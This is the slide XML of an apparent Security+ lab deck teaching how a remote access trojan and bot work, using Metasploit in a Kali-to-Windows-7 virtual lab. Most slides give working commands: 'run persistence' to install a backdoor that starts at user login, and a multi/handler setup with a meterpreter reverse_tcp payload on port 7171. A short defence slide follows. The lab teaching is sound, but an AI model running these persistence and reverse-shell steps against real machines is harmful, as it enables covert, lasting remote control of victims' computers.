0C37-4A84-96D8-748F57894F4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21043A62-A2C3-4843-93AF-48F2D0CD9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8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 algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914343" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800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8" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743029" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657372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2566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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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6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82098494-0C37-4A84-96D8-748F57894F4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21043A62-A2C3-4843-93AF-48F2D0CD9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7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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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0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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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6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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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9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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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8494-0C37-4A84-96D8-748F57894F4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3A62-A2C3-4843-93AF-48F2D0CD9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3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0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EAACC6-E617-44B6-A1AE-5AE93A408D56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RAT/Bot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554B-9AE9-40A5-BBFC-78E51BE7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RAT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EAAF1-02CD-4E77-9FFF-41FB0AE2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7458710" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Create the RAT with the following (two different commands):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run persistence -A -i 15 -p 7171</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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  <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run persistence -U -i 15 -p 7171</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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30CF5-3484-482D-9E87-C75339EBE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5" y="3429000"/>
            <a:ext cx="4590333" cy="190023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CD962C-3CF2-42D3-9012-12441949A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243" y="3429000"/>
            <a:ext cx="4112912" cy="190023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5BB10D-2B64-4A8E-B9FF-E0576F5F475F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6697047" y="3302746"/>
            <a:ext cx="1258233" cy="1900237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0D008E-3BE2-43B5-9365-72EF2CE07713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065574" y="2633232"/>
            <a:ext cx="2745581" cy="5924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Press CTRL+C to get back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> when the new sessions are opened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CB947F-CF61-4C70-8D21-D9BDD2D7B3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351315" y="3302746"/>
            <a:ext cx="4831805" cy="186311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" name="Graphic 13" descr="Exclamation mark">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908EDF2C-4639-4085-B610-702804649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8322" y="2605398"/>
            <a:ext cx="602991" cy="602991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14" descr="Exclamation mark">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72816FE6-85CD-4C79-81F1-2B655F358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2907" y="2605398"/>
            <a:ext cx="602991" cy="60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B2C0-8BA2-474E-86B4-340AB83A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RAT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36EE8-A99F-4CB1-9CB2-3D9DAD048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081962" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s explore the RATs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sz="2475" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run persistence -A -i 15 -p 7171</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2475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  <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2475" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run persistence -U -i 15 -p 7171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450D3E-3F84-444D-8294-680221EA60DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334593" y="3031812"/>
            <a:ext cx="3123107" cy="259675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0BB246-7753-46B0-A4E2-64AE1ABD06E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080886" y="3966026"/>
            <a:ext cx="1716785" cy="259675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02ED8B-8101-4E7D-A224-ACB99C529D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461178" y="3974757"/>
            <a:ext cx="596959" cy="259675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04896D-A31B-4697-9F3C-6C140E40B0F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5065077" y="3967947"/>
            <a:ext cx="1070773" cy="259675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DE0979-EEBC-4ADA-9DC5-6667365487A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1399156" y="3273722"/>
            <a:ext cx="275911" cy="24626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58F0B2-FD7A-4E2F-BD90-ADA300146F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559" y="3469876"/>
            <a:ext cx="1924050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Run the persistence script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8FD1E0-9F8F-498E-BE47-419F6BF3FA25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383881" y="2701061"/>
            <a:ext cx="235744" cy="262961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FE72FC-CC46-4870-B8B1-1090AD671486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571997" y="2330969"/>
            <a:ext cx="1924050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Automatically talk back to multi/handler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FBC032-5DF4-40BA-8A7A-49F0834CBB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4897120" y="3797597"/>
            <a:ext cx="435009" cy="14488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298979-1E6A-47CE-8242-9A46245FBD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865329" y="3563179"/>
            <a:ext cx="2745581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Try to connect every 15 seconds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EA8D12-716B-437E-9538-1D2AC5C8D4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495675" y="4616883"/>
            <a:ext cx="1924050" cy="5924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Automatically start when the Window’s User logs in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27765F-DE84-430B-AC46-8ECE9965545D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4457700" y="4292145"/>
            <a:ext cx="228601" cy="32473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AB2AB1-C4BE-4541-87A3-33A84E896D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7294328" y="3601349"/>
            <a:ext cx="1924050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Connect to port 7171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0377F3-9E06-46A9-9473-B8E7C740DAFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5113200" y="3434338"/>
            <a:ext cx="437859" cy="91567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939C72A-7F4B-445D-8A69-9B5E94DE78E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334593" y="3972851"/>
            <a:ext cx="3123107" cy="259675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F7E8B7-1112-4A15-8B80-E63902FBBC74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334593" y="3712918"/>
            <a:ext cx="295931" cy="15178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9D2B42E-7CF5-436F-9AAF-62256860A37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465331" y="3022143"/>
            <a:ext cx="596959" cy="259675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109D1F-FC13-45B6-8926-AB59C1DE88E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028059" y="3042555"/>
            <a:ext cx="1716785" cy="259675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CD5A54-8FB0-4662-9FF2-9CBF155DD515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059159" y="3029408"/>
            <a:ext cx="1070773" cy="259675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741CCD-D2E5-484C-BD8E-05B7DE30223E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7711615" y="3824452"/>
            <a:ext cx="377951" cy="6917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126EA7-B0C5-4FB2-92FA-5132D671DB7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7463497" y="3298552"/>
            <a:ext cx="458728" cy="26942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3396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2" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31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AA27-9689-4815-A2D6-EE8EDF92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RAT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74931-6CD1-49D8-9AFA-308E535F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00" y="2323323"/>
            <a:ext cx="6077244" cy="2515766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87A4CD3-D991-4996-9BAE-3884EB704600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314307" y="3282339"/>
            <a:ext cx="3123107" cy="259675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FA21F5-85A9-4460-BE6E-92D8C593B1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4457700" y="2151873"/>
            <a:ext cx="643813" cy="103687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4988E2-38B2-47DA-AD07-B144BCAFC689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143350" y="1686710"/>
            <a:ext cx="2480970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Notice the payload is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="309563"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r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</a:rPr>
              <a:t>reverse_tcp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4B92F4-59AB-41F3-9C74-B12E0C082E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703453" y="3690095"/>
            <a:ext cx="3883064" cy="259675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DF9C3E-131B-4713-9584-97B357026702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7368851" y="3167855"/>
            <a:ext cx="629817" cy="49754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A64CBD-EB35-4ACF-B3C3-F6FB63B8F1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694119" y="2807487"/>
            <a:ext cx="1449881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Where the RAT is stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3141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48ED-6D8A-47E5-882C-EC8FCAB7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Reconnect to the RAT/Bot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2402-417C-4F8D-84C6-61C62C00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3955414"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now that the computer is a bot, reconnect to verify it is working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn all computers off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shuts down this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn the computer back on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into the Windows 7 Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Windows Machine just needs to be running (User logged in)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into the Kali Linux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1EB3-DBED-4161-8911-5B83D43D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Reconnect to the RAT/Bot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9436F-D732-422C-ABC5-0F09F8B26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8616950" cy="4026534"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a Terminal and start Metasploit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msfconsole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dirty="0"/>
              <a:t>In Metasploit, open the handler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use multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Match the payload, port, and IP Address of the RAT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set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/reverse_tcp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set LPORT 7171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set LHOST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&lt;Kali-IP-Address&gt;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38E74-25DE-45FB-9DE3-6E5CA3C19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61" y="5314313"/>
            <a:ext cx="5453584" cy="1178560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7627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3912-9CEE-43C9-8ECE-DB339496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Reconnect to the RAT/Bot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EE4F-1F05-404E-8AAE-9C200F45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 to connect to the RAT with the following command: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run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should see the Kali machine access the RAT and open a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session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96C9B-B602-464D-85E7-56D7BBA8E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16" y="4163855"/>
            <a:ext cx="7150368" cy="1403091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6530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E87-2A74-4FE9-B099-0CCD360E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190230" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defend Against a RAT and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all software up to date!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only download and run programs from trusted sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not click on suspicious links </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How else can you defend yourself against a RAT and keep your computer from becoming a bot?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3091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RAT/Bot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Linux Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 7 Virtual Machine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Software tool used (from Kali Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework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Security+ Objectives (SY0-501)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objective 1.1 – Given a scenario, analyze indicators of compromise and determine the type of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DHS CAE Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTH – Describe different types of attacks and their characteristics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you have explored and understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the following lab.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This lab makes use of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348397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RAT and Bot?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10832"/>
            <a:ext cx="8101065" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Remote Access Trojan (RAT) is a tool that allows malicious users to connect remotely to a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Sometime referred to as a Remote Administration Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>An ultimate backdoor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0"/>
              <a:t>A bot is an infected computer that runs repetitive tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Has to talk back with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0" err="1"/>
              <a:t>botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Can also be referred to as a “zombie”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Rat/Bot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4664710" cy="3824744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="428625" indent="-428625">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup VM environments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Open a Meterpreter Session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Check Persistence Options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Create a RAT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Explore the RAT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Reconnect to the RAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="428625" indent="-428625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89C0A-A126-4D2A-9155-FF986EA95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411" y="2181808"/>
            <a:ext cx="4112912" cy="190023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a Meterpreter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4674870" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>In Kali, have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t> session open to the target Windows VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>For reference, use the Backdoor/Trojan 2 Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Let’s see all the options in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2025" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t> to see all the options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Locate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0"/>
              <a:t>This lab uses the run command with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0"/>
              <a:t>   the persistence script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856B4-E5B7-474A-9237-C9D20610F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702" y="2767435"/>
            <a:ext cx="3849483" cy="1968862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EE76D-5215-4260-BDED-632714AC1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62" y="4528141"/>
            <a:ext cx="4459300" cy="1103895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657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AF28-99CE-46B4-9827-BCA7D957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Persistence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4815E-FEC5-4125-A94C-5C3674658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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session, use the following to check the options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run persistence -h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56290-778F-4DCD-B52D-0D1DDCFC1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3469" r="354" b="-179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302170" y="3117928"/>
            <a:ext cx="6539660" cy="268878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157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4F89-83D1-44BB-B48C-7E5EA6E9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Persistence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3FD98-17AF-438A-A649-0DE9DD834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use the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to automatically connect back to multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-U </a:t>
            </a:r>
            <a:r>
